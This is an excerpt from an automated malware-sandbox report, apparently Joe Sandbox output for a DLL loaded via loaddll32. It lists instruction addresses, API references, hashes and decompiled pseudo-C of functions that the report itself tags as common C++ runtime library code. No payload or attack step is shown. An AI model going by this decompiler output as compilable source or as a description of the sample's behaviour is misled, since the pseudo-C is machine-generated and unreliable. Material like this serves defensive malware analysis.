                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F37C
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F386
                          • int.LIBCPMT ref: 6E20F39D
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F3D7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F3F7
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F415
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: pm,n
                          • API String ID: 651022567-2572091394
                          • Opcode ID: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
                          • Instruction ID: 4d7e936a3ed2f7f129a1bd50156fb673837000677847a2d41008beb10c35c4f9
                          • Opcode Fuzzy Hash: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
                          • Instruction Fuzzy Hash: 1811E37590051E8FCF00DBE0C894AEEB77BAF84718F240909E510AB2D0DFB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E204A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e2dce80; // 0x10d6908
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1E161C(0x6e2c6b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1E171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E2066BA(_t61 - 0x14);
					return E6E220075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6E1E18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t61 - 0x20);
							E6E223D74(_t61 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e268192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E204A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E205BFB();
							return E6E220075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E206FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e2dce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}








                          0x6e204a80
                          0x6e204a87
                          0x6e204a91
                          0x6e204a96
                          0x6e204a9f
                          0x6e204aa5
                          0x6e204aa8
                          0x6e204aad
                          0x6e204ab1
                          0x6e204ab6
                          0x6e204aba
                          0x6e204af5
                          0x6e204af8
                          0x6e204b04
                          0x6e204abc
                          0x6e204abe
                          0x6e204ac4
                          0x6e204aca
                          0x6e204ad2
                          0x6e204ad5
                          0x6e204b08
                          0x6e204b16
                          0x6e204b1b
                          0x6e204b23
                          0x6e204b2f
                          0x6e204b35
                          0x6e204b38
                          0x6e204b3b
                          0x6e204b3d
                          0x6e204b40
                          0x6e204b42
                          0x6e204b4a
                          0x6e204b53
                          0x6e204ad7
                          0x6e204ad7
                          0x6e204ada
                          0x6e204ade
                          0x6e204ae2
                          0x6e204aec
                          0x6e204aef
                          0x00000000
                          0x6e204aef
                          0x6e204ac0
                          0x6e204ac0
                          0x00000000
                          0x6e204ac0
                          0x6e204abe

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E204A87
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E204A91
                          • int.LIBCPMT ref: 6E204AA8
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E204AE2
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E204AF8
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E204B16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: 4k,n
                          • API String ID: 651022567-2310321114
                          • Opcode ID: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
                          • Instruction ID: 00ec10d4d1f6f95a13ce8117a06ad8c9da69bf17027057e75645471f1ee739ee
                          • Opcode Fuzzy Hash: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
                          • Instruction Fuzzy Hash: 0011E176E0052E9BCF00DBE0C894AEDB77BBF54715F144A18E510AB2D0DBB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6E24E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6E24F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e24da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e270f34);
					_push( *0x6e270dec);
					E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e270dec;
					while(1) {
						L2:
						_t246 = E6E25D470(_t430, 0x351, 0x6e270f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e270f34);
							_push( *_t373);
							E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e270e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E24CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6e2c506c; // 0x22cbda9b
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E24E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E24DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e24da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E25D60D(_t447, 0x6e270f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e270dec;
													_v460 = 1;
													do {
														_t268 = E6E24ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e270e1c;
													} while (_t365 <= 0x6e270e1c);
													_t362 = _v472 + 2;
													_t269 = E6E25D5BD(_t379, _t362, 0x6e270f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E25D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E242188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6e2c506c; // 0x22cbda9b
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E24D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E24DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
